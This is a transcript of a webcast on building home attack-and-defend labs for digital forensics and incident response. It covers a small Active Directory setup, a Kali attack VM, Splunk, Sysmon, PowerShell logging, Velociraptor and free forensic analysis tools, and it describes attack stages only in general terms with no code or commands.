Shopping Cart

No products in the cart.

Home Labs: Attack and Defend Your DFIR Lab

This webcast was originally published on September 12, 2024.

In this video, Markus Schober discusses how to set up and use attack and defend labs for incident response and digital forensics. He explains the importance of building realistic enterprise environments and the value of tools such as Sysmon, Splunk, and Velociraptor for monitoring and analysis. Markus also covers the incident response lifecycle and provides insights into creating effective forensic workstations using both free and commercial tools.

  • Building a lab environment can significantly enhance your understanding of enterprise environments and attack/defense techniques.
  • Sysmon is a powerful tool for logging detailed system activities, which is crucial for forensic analysis.
  • Creating a realistic lab setup with tools like Splunk and Velociraptor can simulate real-world attack scenarios for better learning and preparedness.

Highlights

Full Video

Transcript

Markus Schober

Welcome everybody to this quick presentation on Attack and Defend Your DFIR Lab. So Zach was just referring to, I might be a little bit too tired after this because I’m actually jet lagged, just arrived in Europe, but we are going to make this through the next hour and I’m actually really excited to talk about it because that’s something I haven’t really presented on.

I’ve been on this webcast before, but not really just on that topic and I think it has helped me a lot in my career, so I’m happy to share with you.

So for those today, I actually have even a proper introduction slide. So for those who don’t know me, my name is Markus Schober and I run an independent blue team training and consulting company.

So everything training and consulting on the blue team side of things, skills development, all kinds of services, is what I started, created about two and a half years ago.

And so that’s what I’m the founder and trainer here at Bluecape Security, but I gained my experience as a principal digital forensics and incident response consultant and manager working at the IBM exports incident response team for a very long time, like seven or eight years.

Gone through all the phases of apt investigations into ransomware, ransomware and even more ransomware. And my primary job was leading these investigations on a strategic side, on the tactical side, performing investigations, and then basically forensic investigations all across from start, end to end.

And so all this experience was pretty valuable. And so that’s what I am sharing with you on my, those webinars, those workshops, the courses that are out there.

But before that I always had like a technical background. I started out as a software engineer, security consultant, software engineering, security, software orchestration and automation, which was a really early thing like ten years ago, which I was doing for quite some time to gain my initial experience in how SoC works and SoC environments and so on.

So that’s where the experience came from. And I’m happy to share something about the incident response and digital forensics attack and defend labs and how they have helped me and how they can help you for professional use and also for personal use.

So this talk here is again something that you can apply in professional environments, but also for personal users. I know lots of people here have the labs and they try to attack and defend already, so hopefully there’s something good for everybody here.

Now, first of all, building out a lab, you acquire foundational knowledge of enterprise environments, and this is really, actually one of the biggest things that I think most people underestimate.

Just by starting to build a VM on anything, you first need to figure out your hardware or maybe a cloud environment, and then you need to build, again, hypervisor, figuring out how to get virtualization going.

And then you build your VMs on top of it and then you connect them and then there is active directory, potentially, hopefully, and all these things. So you really learn a lot of things that you do not really get that you aren’t really taught.

If you’re just a classic blue team or red teamer, it’s all around those enterprise environments, but building them from scratch also can help you a lot.

And then you can also, once you have your, lab up and running, of course, gain more knowledge and better understand, what it takes, those attack tools and frameworks using them.

Attacking infrastructure comes a long way, especially on a blue team. I’m a big fan of people on the blue team sites trying out better, understanding those red team tools, attack tools, and vice versa.

This is just where you’ll gain most of the experience. Then once you attack those, you can develop expertise in how to detect and then also investigate and analyze those attack techniques.

And that’s where you develop those forensic skills and detection skills. And obviously by better understanding how to detect those, you can improve and you can also better understand what telemetry you need and to increasing your visibility to actually get better at detection engineering and preventing those, attacks, ultimately.

So lots of, lots of good stuff you can take away from there. Now, there’s one thing that actually was asking people, pretty recently on what kind of DFIR technology they find most challenging in enterprise environments.

And that’s something that actually helps us a lot also with our labs here, because, no, this is actually interesting. Across different platforms there’s very similar answers. So most people have, challenged by performing forensic analysis, then incident response automation, then data collection, and not so much using those Sim EDR, whatever, NDR tools, but these are all things you can actually get better at by using a lab.

You can actually, when you attack and analyze your lab, you can apply forensics tools, you can do data collections, you can improve even those, response processes, forensic processes.

So this is all good things that you can get out of, when using your own lab. So what are some of the lab components, the initial kind of foundational baseline of what you need.

I already mentioned that earlier a little bit. But the goal here is that we want to have a simulated but yet realistic enterprise environment. There is maybe some things you can learn by using individual VMs and doing certain things, but when it comes to realistic training, we actually want to resemble or simulate something that basically replicates what’s going on in an enterprise environment.

And by that I specifically mean a domain controller, active directory, clients joined and things along those lines. On top of some of the tools, we also want to execute real world attack techniques.

And for that we need some of the real world tools that you find out there. And many of them are open source, so it’s pretty easy to get them. We want to make sure that we capture the right data.

So logs and telemetry so that we can actually understand what we are looking at, right, understand what it took for an attack technique to be carried out and then understand where we can find the evidence and those traces, the events in the logs, in the telemetry that we need, and then conducting forensics and incident response that goes from using those sIm tools and EDR tools all the way to performing digital forensics on disk images, memory images.

So a very realistic process and a very simulated yet realistic environment and process to perform attack and defense.

So for the basic components that is basically something like this, I like to show that as a guest environment, a virtual environment within a hypervisor.

across the next couple of slides you will also see constantly links there. So all these things that I’m talking about here are basically documented as tutorials on my website. My website is bluecapsecrety.com.

and then build your lab is where you have step by step instructions, for free of course. where you can find how to build this kind of environment that you see here by adding VMs to a hypervisor such as virtualbox.

And then you basically make, make a Windows server and promote it to a domain controller. You install an active directory and then you join the Windows client to it.

And then you basically have two systems that talk to each other and that’s basically what the core of a enterprise environment looks like. You have domain services and active directory and Windows can authenticate against the domain controller.

So you basically have the basics, everything that you need in order to have like a real pretty realistic environment.

And on top of that we also want to have an ATT and CK lab. And so when we have, when we’re talking about attacking this infrastructure the easiest way, if you just throw a ATT and ck VM m into the same virtual lab for testing purposes.

Obviously that’s always fine, but it’s within the same AP range. If you want to get fancy, of course you want to maybe put a Kelly Linux box somewhere behind a more realistic attack infrastructure, somewhere in the cloud maybe, or so.

But the point really is just to be pretty transparent and so you can easily access, the ATT, and CK lab can access your environment and vice versa.

But all you need is a user, a domain controller and an ATT and CK lab. Or an ATT and CK VM. Sorry. And so how to set it up again, you can find it in the link below. And from there we now, when we have the baseline, we can now talk about what are the tools that we as a defender would like to have in this lab.

And that gets us into adding extra tools, installing things, adding telemetry to it. But first of all, we need to understand what you can see in a SoC environment.

In a security operations center, there’s, for those who work in opera on socs that basically know exactly what I’m talking about here, for those that are not too familiar with it, in the security operating center you have analysts that are constantly monitoring for events and alerts.

Anything malicious that might show up events, they basically take them, investigate them and see if there’s anything worse, anything bad, anything that needs to be escalated, any incidents, or they can close out the event, the issue.

And to do so, you have a couple of tools, usually available. And the basics are basically described in the SAARC visibility tree out. And that’s described by Gardner.

But what it is is that for the longest time we’ve always had sims. So basically those are the tools that would collect all the events and the logs from all kinds of different systems on the environment.

And then next was the endpoint detection response tools. Speaking of crowdstrike and things along those lines, those are the tools that have agents installed on your virtual machines or on your endpoint systems, and they are constantly checking in with the server.

And within the server you can then basically see anything that’s going on on the endpoint. So it collects telemetry, does a lot of analysis, correlation, it would automatically create alerts if there’s something malicious, detected malicious behavior.

But long story short, you basically see specifically what’s going on on the endpoint. And then third, which is more like a current kind of trend, there is also the network and there’s data traveling, traversing the network.

If we had visibility into that, that’d be great. And that’s called NDR and network detection and response. So same idea as EDR, but just with the network telemetry and network data.

And the most fanciest term these days that you have out there is XDR, which basically combines, all three tools and the data of all three tools. And it’s trying to make sense out of it.

And of course there’s very advanced ways. I don’t want to get into this too much, but basically those are the three different angles that we can look at in a soc, environment.

Ideally, when it comes to investigating and detecting potential malicious activity. So how can we get to this point?

Now we have a few options here. You can see there’s the lab that we’ve talked about earlier. And to that lab, we now want to add some tools for sim.

There’s a few tools out there. most people are probably familiar with elk or with elastic, and also splunk most commonly. And the good news is you can actually install splunk, which is pretty straightforward for free on your lab.

There’s a trial version, or there’s a free version license option possible. So you basically switch the licensing to free and then you can limit it, but enough for a lab.

Use splunk on your systems, on your lab environment. And it would basically, get you the same interface as the professional version. And everything you do in there is just replicates exactly what you would see in a professional environment.

This is really cool, but this is a tool that needs to have those events forwarded into the server version into the server system. It depends on where you install the server.

Here you can see Splunk is installed on the host environment. You can have an extra separate VM for that, if you have extra capacity in terms of Ramdhenna CPU’s, or you can install it on your host.

But where the server is running, you then need, forwarders, for example, on those clients, Windows clients, that the forwarders that are installed on those clients would then send the event logs of those systems to the splunk server.

And that goes basically in real time. And so whenever you open your splunk console, you would then see data that you just, collected from those systems. And obviously, if you imagine that is going to be the case in enterprise environments, where you have thousands of systems forwarding events into a system like splunk in the SiM, that’s where you can really then correlate and search for potential malicious activity there.

Of course, that’s a lot of data in there that’s why we are constantly overwhelmed. So ideally you can tune it and, make it easier, for analysis, but that’s pretty straightforward to do in your own lab.

You can just, go ahead. You also have a, tutorial up there to set up splunk for free, even on a video, including the formulas as well as on the server side of things.

And then we also have, another couple options for, edR. Now, EDR is the tool that actually is one of the most expensive.

Splunk is expensive too, of course, but EDR is really pretty hard to get because there’s not really any trial or free versions out there. Like speaking of Crowdstrike Sentinel one, which are the two main, most common ones.

so getting that into our lab is probably not so easy. But there is another tool called velociraptor. I’m sure lots of people have heard about it already. I also covered in our workshop, velociraptor is somewhat like an EDR because it is also a server that install, and there’s also agents installed on the endpoint, also on those Windows systems, but those agents are just constantly calling in, checking in with the velociraptor server.

The velocity of the server basically can provide you, real, can actually, you can apply real time forensic analysis at scale, basically across all the systems that you have the agents installed.

You can basically run your forensic analysis from within the server console, and it would then automatically, apply to all the hosts that are in scope.

And that can be done across thousands of hosts. It’s very scalable when you can potentially then perform initial analysis, just like you would do in an EDR.

that goes a little deeper than just looking at log, when looking at logs, for example, in splunk. So that’s obviously also another really helpful tool. And, yeah, I highly recommend checking it out.

And because the good thing is velociraptor is open source, so you can actually use it for free. And that’s something that’s out of scope. In this, diagram here is basically, it would of course be a huge bonus if you can also add a network, captures or logs, for that, there’s a couple of images out there.

But what you see here is this is basically what I, would set up for any workshop that I run. So most workshops of mine also, for example, at the Wild west hacking fest, I run the ransomware, attack and defense class.

Every student gets this setup. So this is what we are using in order to attack our lab environment in day one and this is what we’re using in order to investigate our lab environment on day two.

So those are the main components, that’s everything you need. And from there on you can attack whatever you want based on the tools you have on Kali. And then you can also use, the other tools, the defensive tools, DFIR tools for the investigation.

Now there’s a few things of course, out of the box. it doesn’t just work like this. You need to basically, add a few settings. for example, if there’s windows defender on, it’s not so easy to just run attacks on this.

So for a lab environment, depending on how sophisticated you want to get. But I would turn off the fender, of course, that makes sense. And then just as in any production environment, there’s some tuning that we can do and that for example can be adding some visibility into Powershell logs and system unlocking.

And that’s just the two basic, setups that I would recommend, over here. So first of all, there’s some, if you can, not sure if you can read that, but that’s basically in the group policy, editor, you can set settings for Powershell logging.

So by default, windows Powershell does a Windows Powershell logs that logs execution of Powershell and some additional context. But there’s more that we can do. And there’s for example, settings such as module log, adding, module logging, script block logging, transcription logs and things along those lines.

That is all additional information you can get out of a system for anything. When Powershell executes. The really, really cool one is Powershell script logging because that is the one that would actually capture the payload of the script.

If Powershell gets executed with a certain script or payload, it would even log the payload within this script block within the event. If there’s not enough room in the event, it would log multiple events across your event logs, with the content of this particular execution.

And that can be extremely helpful because then you basically have the full script and can see what’s running. And on another point, the script, logging would automatically also add warnings if it detected something that even looks suspicious.

And it’s doing that by correlating just certain keywords. So there’s a list of keywords that it’s looking for and it would even add a warning onto these, logs or events that are locked.

Additionally to that note, lots of payloads these days are executed and that are getting executed are basically base 64 encoded. It would actually log, those payloads in a decoded way.

So you don’t even have to do the base 64 decoding anymore because it logs it after the payload has been decoded. That one is actually one of my favorite events, event logs that I would look for if it’s available when I perform investigation.

secondly, of course, the way how to get most of the visibility of what’s going on with an endpoint is by adding Sysmon.

Sysmon is basically a driver that would then create event log, an event log, and within the event log it would capture much more granular data of anything that is going on within a Windows system.

So most of your people are probably familiar with Sysmon, but this one really can be extremely helpful if you have Sysmon available. That’s basically all you need to basically understand an entire investigation because it does capture events, such as event id number one, which is a process creation.

When a process creates, basically Sysmon would capture the process id, the image. It’s basically the executable of this process. It would then also capture where it was executed from.

It would capture the command line, the command that was used to execute this particular process. So you can see even the command line arguments that come with it.

You can see the user associated with the session, the logon ids. And then it would also, on top of that there’s the hash of in this case Powershell.

And then it would also add information about the parent process. So the parent process with the process id with the image. So in this case CMD exe, the parent executed Powershell.

We can see that here CMD Exe was executed to trigger Powershell. In this case it would actually then execute register Exe. And then you can also see global unique identifiers that basically are associated with the parent process.

So not just the id, but a unique id that you get as well as for the current process as well. Over here, somewhere up here, process guid.

So basically over here there’s a unique id that you can use to search for anything that this process did across your entire log. Once you have identified a malicious process, when you can apply this global unique identifier and search for it across your logs, then you basically get an entire list of everything that was associated, all the events that associated with this, with this process.

And that is really cool. So these are just some enhancements that I would add to the lab. And what, it also helps a lot. Of course it takes some consideration if you can add it into your production environment, hopefully you can.

But within a lab environment, I would like to add as much visibility as I can because I want to learn, right. I want to see if I trigger something, what happens on, on my investigator side of things.

And if I don’t see anything, then I basically don’t know, what just happened. And only if I can basically log, all this data, then I can better understand what it’s doing and then better understand how we could potentially detect it.

So with the lab set up, let’s talk real quick about some options of how to execute attacks. Now we’ve all heard or seen about real world attacks, and many of you are probably in some of offensive red team role, so you probably know exactly how to do that.

But here’s just for inspiration. How would that go down if we want to perform a somewhat realistic attack in our lab environment? So for that, we would now turn into our kali box.

And Kali comes with a whole lot of tools out of the box, so we can actually add a few, install easily, some for example, command and control frameworks, and then start a compromise and initial access onto our Windows client.

Once the windows client is compromised and we have a control over the Windows client, we can then operate on the Windows client and maybe try to add persistence.

And as you can see on the left hand side here, even you have command and control access to it. And then you can execute commands, you can execute shell commands or use living of the land binaries, which is very common.

You can try to escalate privileges, elevate privileges in order to then from there pivot in over. Let’s move laterally to the domain controller. Then you can better learn and play around with understanding the credentials you need in order to perform a lateral movement.

Using techniques such as pass the hash, pass the ticket things along those lines. You can also look into what the most common techniques, are for data exfiltration. And you can also run some ransomware simulators.

There are a few out there. If you just look them up on, on GitHub for example, you might find a view, some really cool. So this is all the things that it takes to basically create attack patterns that are pretty realistic, right?

We don’t need fake data, we don’t need any fake anything. It’s just you basically attack and you just try to emulate all the different tactics that you see in real world cases. And for some inspiration, of course, there’s ATT and CK reports out there.

There’s some trends blogs out there by some of the vendors, they just basically oftentimes even with IOCs and the specific tools that they were using, would blog about the certain attack.

And one thing you can use. So if you have recognized down here, if you’ve noticed, there’s a link down here on the site, attack, defend your lab. So this is a video that I did on basically starting this attack on this lab, going all the way into getting a foothold, performing executing scheduled tasks for persistence and then how we will go about investigation.

So there’s a free video, you can check out on that as well to get a better idea of how you would operate this command and control kind of attack, from there on, and there’s a blue teamer that might be really helpful.

This kind of video for red teamers may be pretty straightforward, but still, this is kind of the thought process behind this.

So this is a slide that some of you that have been in my webinars before might have seen, but I just love to use it over and over and over again because it is still very true.

It describes a very, but generic but somewhat in detail, a ransomware attack lifecycle. And this is most of the time pretty straightforward.

Some of the tools might change, but the phases or the stages are oftentimes the same. So if you want to emulate that, this is what we also do in our workshop, in the wild west hack infest workshop for example, that is exactly the steps that we would apply in our lab and then investigate them.

So the first one is stage. The first stage is always initial access. A threat actor needs some type of access to a system. First of all, in order to even infiltrate the environment and go from there.

And that usually starts with what we see on a daily basis, phishing, emails, exploiting any, some kinds of services, anything that just gets them an initial foothold on a system.

And then from there you would see this particular tool or whatever they were able to run, or the task would then create a the malicious binary, I don’t know, whatever you just got on the system would create a persistence mechanism so that it would actually call back to the mature malicious service so that the threat actor can control the machine and from there provide access to the second stage attacker.

This is mostly initial access. And from there, somebody taking over the post exploitation would probably come in and say, basically use this command and control the initial one to deploy their own tools.

Oftentimes that’s something like cobalt strike command and control framework and then because that’s pretty powerful. And then from there start with reconnaissance, trying to figure out what’s on the system, any weaknesses, any escalation, potential privilege escalation they could do there.

What’s gathering information about the environment, some discovery around the local system, the active directory domain admins, domain controllers, file j’s that might be available from within the system and the user that is compromised.

And then ideally there’s enough information to move laterally to a different system. If you have a bigger lab, of course you want to pivot across multiple systems.

There might be some critical systems, some less critical systems, but you basically just move laterally in order to at some point gotta get a good idea of the environment to be able to target the data that you’re after.

And oftentimes that basically brings us into stage four. You target the data that is oftentimes on a file share or somewhere else and you will have to stage it.

So copy it somewhere where you can then ideally just copy it and exfiltrate it out of the environment. And for that you would use r clone and some FTP clients or whatever.

that’s the most common ways how threat actors would do it. and then finally, as you oftentimes see, when ransomware really ransomware threat actors really get all the way through at the end, they would then trigger the ransomware across the environment with privileges that they have gained that are they with domain admin privileges, for example, so that they can actually execute some binaries across all the systems that they know about.

And that executable would be the binary. It would be basically the ransomware binary, which then starts encrypting all their files and data and sharing the keys, the decryption keys with the command and controller, with the ransomware server infrastructure.

That’s what you’re basically left with when the attack is carried out. That is from start to finish, how an attack like this would go down.

And as an analyst, that oftentimes is basically what we are left with. In the worst case scenario, organizations basically just figure out, or notice the compromise, by the execution of ransomware, which means we are already over here.

So all these things already happened beforehand. Now we need to figure out first of all, containing the damage, but also figure out everything that happened beforehand if we want to really do root cause analysis and understand the scope of the compromise.

And that’s where we came in now as the investigator. So here’s just another quick view. like I said earlier, when we carry out the attack, in this case, there’s empire, installed on the kali box.

And, with empire, you would create a payload, you would deliver it to the windows client, execute it. And then this is a screenshot of empire just received a new agent.

So this is the command and control, the beacon, the agent that is, that we can communicate with in order to execute everything that we just, covered in the ransomware attack lifecycle. And, again, this is the video that you can watch in order to see, how this can go down, how this worked out in my own lab.

So with the ATT and CKD, carried, out, now we can think, the goal here is a dfir lab. So we can think about how would we respond.

Now there’s a few things. First of all, people are probably familiar with the incident response lifecycle. But really, how I would look at this from a realistic perspective of how we would start this investigation is in a large environment.

We would initially probably get into our sim, in this case, our splunk, because we first need to even identify, any potentially compromised system and the scope of it.

So if we know there’s a certain executable, that, ransomware executable that was executed on multiple systems or a particular compromised user, we can run through this blunt logs and basically identify potentially any endpoints that might have had the user log on or the ransomware execute.

So we basically had a better scope of, just anything that might already be compromised. Because from there we can then more targeted start an analysis.

And with the analysis here. So the first step is before we can dive deeper. I mentioned EDR before. That is a really good option, of course. And with the last eruptor, this is where we could ideally then run and, perform forensics, some forensics to some extent at scale.

So we will basically run an, investigation, openvelociraptor, run a hunt, an investigation, basically to carry out a particular task across a section as a subset of systems, or all the systems.

For example, we would see, hey, if there is a malicious phishing email or a phishing attachment, you can search for any system that basically contains this particular file name or any system that you can even perform.

Yara searches across systems that have a particular, for example, a malicious binary or some malicious code running, you can see check for scheduled tasks that any system might have.

You can basically run all the forensic artifacts across your environment, with velociraptor. And this is pretty cool because you can then get a better idea of even more granular the scope of, hey, anything that is not captured in events, event logs.

Now we can look a level deeper, a little bit more detailed, and then from there we might be able to better understand, hey, which systems might have been used for initial access, which system might have been used as a pivot point for an thread actor moved onto laterally, which systems might have been the ones where data were stolen from or where they actually staged the data on in order to exfiltrate it.

So then we can better, assign labels, even in velociraptor onto these, hosts and then decide, a more targeted analysis approach.

On which systems do we need to take a much closer look on now, based on priority, which ones are the systems of interest, which ones are the system that are really critical for the next step that we need to look closer into understanding how did they get on there?

What did they do on there? For that, to get the data, we need to perform forensic analysis. But to get the data forensic analysis, we need to perform a data collection.

And data collection is something that can be done in many different ways. And I think I was actually, on an anticast session, here a couple of months ago, where all we did was basically talking about the forensics process and how critical data collection is.

Because data collection is basically, if you mess it up, you basically don’t, have anything to analyze. first of all, you need to get your data collection before you can actually get to the analysis process.

This is an often overlooked issue because sometimes you don’t even have a good handle on the systems that are currently compromised. What if they are in a different continent geography?

What if they are in a cloud environment where your CSert Soc team might not have access to? All these things need to be ideally, proactively established those processes before, you start figuring these things out when it’s, urgent.

You can also use velociraptor, for example, to perform data collections across systems. Data collections can be done in a way of, you capture the memory, you capture disk image.

Those are large, large files, gigabytes, terabytes of size. Pretty slow process, but sometimes that’s needed. Although we don’t need m all the data usually on a Windows system, for example, there’s just a few Windows forensic artifacts that are really critical for our investigation later on.

For that, we can actually then do something called a, performer, create triage collections where we just collect the data, some of the data we need from those systems, that’s of course a much smaller collection.

At the end of the day there might just be maybe 300 megabytes, maybe 500 megabytes per system instead of gigabytes per system. And that’s more doable.

We can collect those from multiple systems and then moving to the forensic analysis and that’s where we can then really perform system by system, a detailed offline analysis looking into all the Windows artifacts to answer questions that we might have not been able to answer previously.

So this is how the steps typically go down. And this is what you can also do easily within your lab environment. Go from simdhenne to velocirapt EDR, perform a data collection and then look at the data on your forensic analysis system.

So here you can see this is kind of, what the beauty of splunk, what you can do in splunk, you can even do visualizations to better understand for example who your systems connected to, which ports, which for example you can see here then in velocity.

This is basically a list of systems we would have available here. And then you can interrogate them and run hunts across those systems. But at the end of the day if we perform a forensic analysis, we need those tools and we haven’t talked about the analysis tools or lab yet.

And so here just one. For the remainder of this, I want to give you a couple of tips on how you can add a really nice forensic workstation with free tools and everything that works pretty well.

Now let’s think about what we actually trying to accomplish. And that might be different. There’s not like one size fits all forensic analysis workstation. You might want to have to analyze Linux systems another day, Windows systems another day, Mac system another day.

It might be some logs. it’s just all kinds of requirements. So it’s best to first understand what you are looking for and then create a specific, purposely built lab for that or analysis machine.

so you need to deal with the data acquisition first. We already covered that. But once you have data you might have to mount it, you might have to process it, for example disk images, memory images, logs and then you would have to potentially look into memory images, you would have to look into disk images, then you have to look into the logs and those are all different tools that you might need for that.

And then there’s even malware potentially. So you need to have some basic tools to perform malware analysis. And then finally there’s even something called timeline analysis where you just would basically parse all the artifacts you have sort sorted by time.

So you have in chronological order kind of everything that happened on the system, which is usually a lot of data, but it might actually be with that you might be able to close some gaps and see what happened in between.

Some timeframes where you might have not had any visibility with any previous analysis technique before then you might move into reporting. So a lot of these, there’s a lot of tools and there’s a lot of considerations and each one of these requires their own sets of tools and skills.

So we have a few questions, right, we need a system that we can use for the triage and the analysis of disk images, memory images, various logs.

Do we have network captures, do we have network logs, do we have pcaps? And how deep can we go with malware analysis? All these questions then. Secondly, and this is actually pretty interesting, especially when it comes to production environment where you might have to set up your forensic lab.

environments, where do you host it, do you need a physical system because they are pretty powerful. What can you do? Virtual? The trick is with virtual you basically destroy your VM m when you’re done and you have a brand new one easily available as soon as a new case comes in.

That’s really cool. Then you need to think about you need Linux or Windows system because some forensics tools only run on Linux and some only on windows. And then do you want individual tools or do you want to do suites where basically have one powerful forensics tool that actually parses out a lot of information for you?

Those are pretty slow but powerful. Or do you want individual small tools to get the quick wins depending on what you’re more familiar with or what does the job best for you.

And then obviously for production or I enterprise environments, are you going with the commercial route or do you want to rather prefer open source? there’s obviously a big price tag on those as well.

Now here are a few options that are ready to go. People have built entire VMs before for the purpose of forensic analysis.

Now here’s just a few screenshots of logos of the VMs that are out there. the first one is for example the sift workstation that has a bunch of forensics tools on there.

It’s on Linux, it’s based on Linux and it’s provided by sans and they’re using it for their workshops. And as long as you are fine with just using Linux tools for your analysis, that’s definitely a great forensics option.

Now there’s a few other tools that might not be exactly just for desktop memory analysis, but they still can get you pretty far. Just a flare. VM, this is provided by Mandiant, which mostly has been built for malware analysis, but it’s on Windows, so you have a ton of tools that you can install on a Windows system.

Remnux is another malware tool that is also, maintained by people from Sans. And it helps a ton with malware analysis, but it’s on Linux. Then as we all know, there’s Kali.

And Kali also actually has a number of tools on there that can be pretty handy for some forensic analysis. And you can easily add tools, obviously. So it really depends. these are just the VMs you can download right away or install and then, get ready and going.

Now they all have pros and cons. I usually always prefer to build my own VM because I just like the few tools that I want and nothing else. And that was mostly on Windows.

So here is a list of tools. So you can also find it on my website. There’s a build your forensic workstation, tutorial. And aside of how to build the entire VM and everything, there is a list of tools of recommended tools, just because the ones that I would really think that can be very helpful.

So when you perform forensic analysis, you need to usually mount a disk image. And that can be done with arsenal image mounted, which is by far the best tool out there. Or you can also use FDK in measure.

It also has additional views where you can open files and folders from there, which can be pretty helpful. Now, speaking of the suits, you can basically have free ones where autopsy can come in.

Sleuth kit. Autopsy, is a forensic tool that already does a lot of parsing for you as soon as you start a new project and analysis with it.

you can also run kape, which is the crawl artifact parser where you can extract, it can help you to extract data from a disk image, or it can help you to automatically parse it by applying parsers such as direct Zimmerman tools.

those are my favorite tools for Windows analysis when we’re talking about individual tools, the artifacts that we would often look into, of course, when we do browser analysis, there is the, the nurse of browser view, browsing viewer or something called that is out there, that is free, that basically parses out browsing history of the most common browsers, which is really cool because then you can see the browsing history and stuff, that was downloaded by the user.

So if you have a need for looking into browser, that’s a good tool. Now for parsing memory or analyzing memory. Obviously there’s volatility, which is the one and only, biggest, most common tool out there.

There’s a few other options that you can already use, that might be more compatible with Windows, for example, such as memprocfs. Then there is the typical Windows forensics tools that Eric Zimmerman has written, and then a few additional ones such as regripper, which just does a few things a little differently, which can also be very helpful to parse registry hives.

For example, Arximmerman tools, for those who are not familiar with it, basically has a parser for almost every single artifact that is on windows that you can then turn into data such as a CSV, and then look into it based on a chronological order and find m the badness that you’re basically looking for.

for malware, there’s a ton of things that you can go as deep as even analyzing assembly code. But for quick triage, quick wins, just figuring out what this malware might be doing.

There is a tool called PE studio that gives you a ton of information about executable, portable executables. Cybershef, of course, is a tool that can help a lot with encoding decoding payloads that you might be able to dig up from logs or so like Powershell payloads.

Shellcode, debug is great for decoding Shellcode and better get a better understanding of some of the indicators such as network, artifacts and IP addresses that might have been buried in shellcode.

For timeline, like mentioned before, plaso log to timeline is pretty cool. Now this is just basically a quick set of tools that I would often just refer to and use when I perform an analysis and not when I would build my own, forensic workstation.

Now the one thing is then though, how can we do this, all these steps? Now we have so many things that we have to do manually and it can take pretty long time to get all the way into.

From start to processing data. Sometimes the processing itself takes hours, a days. If you do timelining, for example, and then looking at every single artifact at once on the disk and the memory.

This case like dozens of artifacts, we could look at potentially event logs and processing those that can be hours or days even per system. And so the one thing I wanted to leave you with as well is that there’s ways we can think about automating all this in a really cool way.

there’s actually many ways, but one way that I wanted to show is for example, something like this. Now if we think about what we need is we just want to have all that work done for us and then just be able to look at the output and figure out what the malicious behavior was.

And this is a really cool illustration that somebody has done on a GitLab account. But really the credit goes back to Eric Capuano and Whitney champion.

They have posted about this, in the first place, I think they have a GitHub repository for this too, which is called velocity raptor two time sketch. And the idea here is this is something that you would see also within incident response enterprise environments where you might use Velociraptor or edrs or something where that you leverage in order to perform remote data acquisition, you just need a tool that has an agent not installed on any of your endpoints.

Then you just basically run a data acquisition. It would then upload the data automatically into a bucket, into a repository. For example here in Google storage, the output of the data collection lands under Google storage.

And then there’s some automation happening that would automatically just trigger, for example, plaza, and log to timeline to build a, to parse the collection and create a timeline from it.

And then when you have this timeline, which is usually in a plaza format, which is just a container, you need to transform it into something readable. In this case you could do CSVs, but in this automated workflow, the data population analysis can also happen in specific tool.

And one of them, for example, is time sketch. It’s based on an open search. So it has a little bit of an idea of the elastic or elk stack, but it’s an open search and it’s maintained by Google.

It’s a specifically purpose made tool for analysis of forensic, data as an incident responder. That’s pretty cool.

All you need to do is you log into Velociraptor, you trigger the collection, and then a couple hours later probably you will be populated with the data within your analysis tool.

Could be splunk as well. In this case, time sketch is pretty cool. that’s how you can save a lot of time and actually have a pre consistent workflow.

Then just finally for looking at the data, this is what time sketch looks like. It’s again open source and maintained by Google.

It has a little bit look and feel of it’s an open source or look and feel of like a sim or so. But you have events, and for each event, and this is the cool part, you can actually tag them, you can add labels, you can then basically see the data here, the data source here, and then automatically just basically collaborate as a team on the same timeline to figure out what the malicious suspicious events are within the data that, you are, seeing here for the analysis.

It, takes maybe a little bit of learning curve to get the data in there. You can automatically push plaso files into timesketch, you can parse plaso, and then it has some additional features which are really cool.

You can run sigma rules, you can add indicators of compromise that it automatically tags any occurrence of an IOC anywhere in your data. And of course you can run complex searches across the data.

And then eventually, if you just show your results or the text, the labels that you’re interested in, you might just be left with anything that’s malicious. And that’s really cool, right? Because now you have a chronological order of events that are suspicious or malicious.

You can then export those, you can write a report on that, or basically anything you need, in terms of reporting afterwards. So analysis and the alternative is always without time.

Sketch spreadsheets. People would also always use spreadsheets. I’m a big fan. Excel is probably the most powerful forensics tool out there still to create timelines. And, I will always probably be the case.

But this is a really cool way of doing things, when it’s part of this workflow, and I think that’s already it. So if anybody has any questions, I will stick around here and, for a couple more minutes.

You can also check out the free tutorials that are all on the bluecip security site. Please feel free to check out the resources. That’s, kind of in the pre, session show here.

We talked about how I got into this because of the tutorials that I put out there for fun, first of all. Now it became its own thing. You, can also, check out other resources, courses, things along those lines.

But, yeah, and the Discord channel. If you have any questions. Tiny URL, discord. Yes, I need to look up, discord on my phone here.

Unfortunately, I can’t see it on my browser or on my laptop, but, Zach, please let me know if I missed anything or if there’s any questions.

Zach Hill

Yeah, for sure, man. No, thank you for, sharing your time with us today and sharing your knowledge. It’s always, always appreciated fantastic, man. there are a few questions we got from zoom.

I’ll try to go over a couple of them. I know you’re exhausted, so, but you got everybody. I mean, you gave everybody a ways to contact you, so thank you for doing that.

Appreciate that. but one question I want to get right away, and it just jumped away on me. Now, hang on. I’m sorry. it was basically asking, is it okay to use one kali box as the attack and defender machine?

I don’t know where that question went now.

Markus Schober

Oh, I guess because I added Kali as part of a potential forensic analysis system.

it’s just a lab environment. Obviously, anything is fair game. whatever works best for you, I think. if you use it for the attack, whenever the analysis starts, the attack stuff is already done.

You can just as well work with your kali box, if that works for you, and if you don’t have enough resources to set up additional VMs or anything within your lab environment.

Zach Hill

what was the thing that has parsers for every artifact on windows that is plazos?

Markus Schober

Log to timeline, and, let’s see if I can find it here.

Zach Hill

If you find that, I’ll put it in the,

Markus Schober

Just look up. So lock the timeline on GitHub, you find it. Or this list of my forensic workstation guide. that is a, really cool approach. basically what it does is you run it and you can select which parsers you want to apply against a windows disk image.

One, two, three, or all of them. And if it’s all of them, like a few dozens of parsers would actually be applied against the windows image that you’re providing.

All the artifacts are basically put into one container from the output, and you can analyze all the artifacts in a single timeline. And, that can be overwhelming because it generates a ton of data, but it’s a really, really good way.

That’s a little time consuming, but a good way to make sure you’re not missing anything. Otherwise, awesome.

Zach Hill

Thanks, sir. Mario asked, can you please explain the difference between logs? And they say they understand logs and telemetry. I’m confused about telemetry regarding visibility in our environments.

Markus Schober

that’s a good question. Yeah, I was actually. I think when I did this presentation somewhere initially, I, tried to make sure that I’m very explicit about that, but I wasn’t today, I guess, maybe.

And, actually, it’s kind of logs is just part of telemetry, right? Telemetry is any kind of information. Description is of it. But in my point of view, it’s just basically telemetry is any kind of event or data that you can gain information from.

